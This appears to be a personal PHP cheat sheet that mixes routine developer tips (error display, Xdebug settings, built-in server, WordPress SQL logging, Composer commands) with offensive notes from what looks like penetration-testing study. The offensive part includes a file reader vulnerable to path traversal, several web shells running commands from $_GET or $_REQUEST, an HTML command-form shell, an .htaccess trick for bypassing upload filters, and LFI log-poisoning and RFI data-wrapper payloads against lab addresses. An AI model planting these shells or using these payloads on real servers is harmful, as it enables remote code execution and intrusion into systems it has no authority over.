Display errors

error_reporting(E_ALL);

ini_set("display_errors", 1);
ini_set("display_startup_errors", 1);

ini_set("error_log", "/projects/file_error.log");
error_log("Hello, errors!");

Xdebug

https://gist.github.com/jamesstout/fd6eae2b2ba34e7f32ff3e1a179d55fe

php -i | grep xdebug 

zend_extension=xdebug.so
xdebug.idekey="XDEBUG_ECLIPSE"
xdebug.remote_enable = 1
xdebug.remote_autostart = 1
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.max_nesting_level = 512
xdebug.remote_autostart = true
xdebug.remote_host = 10.0.2.2
xdebug.remote_log = /var/log/xdebug.log

sudo /etc/init.d/apache2 restart

Random _GET

$file = $_GET['file'];
$fh = fopen("files/$file","r");
while ($line = fgets($fh)) {
  echo($line);
}
fclose($fh);

<?php
 if(isset($_REQUEST['cmd'])) {
   echo exec($_REQUEST['cmd']);
 }

Start the built-in server in PHP

cd ~/public_html

php -S localhost:8080
php -S IP:PORT -t web_dir/

Wordpress log sql queries

<?php 
// Include this on your functions.php

function log_sql_queries($text_query){
    /* //Uncomment me if you want a lot of info about where the sql query comes from and what action started it off
    $traces = debug_backtrace();
    foreach ($traces as $tobj => $trace) {
        if($trace['function'] == 'do_action'){
            $args = $trace['args'];
        }
        error_log("TRACE:$i:"  . $trace['function'] . print_r($args,1));
        $i++;
    }
    */
    error_log("INFO:SQL: " . $text_query);
    return $text_query;
}
add_filter( 'posts_request', 'log_sql_queries', 500 );

Switch between php versions in MacOS

brew unlink [email protected]
brew link [email protected]

Composer

Composer update keys

composer self-update --update-keys

Change composer version

self-update --1 #to rollback to version 1

Update composer without memory limit

php -d memory_limit=-1 `which composer` update

Code execution

On PHP server

<?php
echo '<pre>';
echo 'passthru: ';
passthru($_GET['cmd']);
echo "----\n";

echo 'system: ';
system($_GET['cmd']);
echo "----\n";

echo 'shell_exec: ';
shell_exec($_GET['cmd']);
echo "----\n";

echo 'exec: ';
exec($_GET['cmd']);
echo "----\n";

echo 'POpen: ';
pOpen($_GET['cmd']);
echo "----\n";

eval("phpinfo()");
echo '</pre>';
?>

We can also have the following (which create a form to run command from)

<html><body><form method="GET" name="<?php echo basename($_SERVER[\"PHP_SELF\"]); ?>"><input type="text" name="cmd" autofocus id="cmd" size="100%"><input type="submit" value="Go"></form><pre><?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?></pre></body></html>

Bypass PHP upload filter

AddType application/x-httpd-php .cth

LFI (Local File Inclusion) Contaminating Log Files Write php code to log file for executing shell commands

kali@kali:~$ nc -nv 10.11.0.22 80 (UNKNOWN) [10.11.0.22] 80 (http) open <?php echo ‘<pre>’ . shell_exec($_GET[‘cmd’]) . ‘</pre>’;?> http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig call url with LFI and GET[‘cmd’]

RFI (Remote File Inclusion) PHP Wrappers http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec(“dir”) ?> to execute arbitrary php code.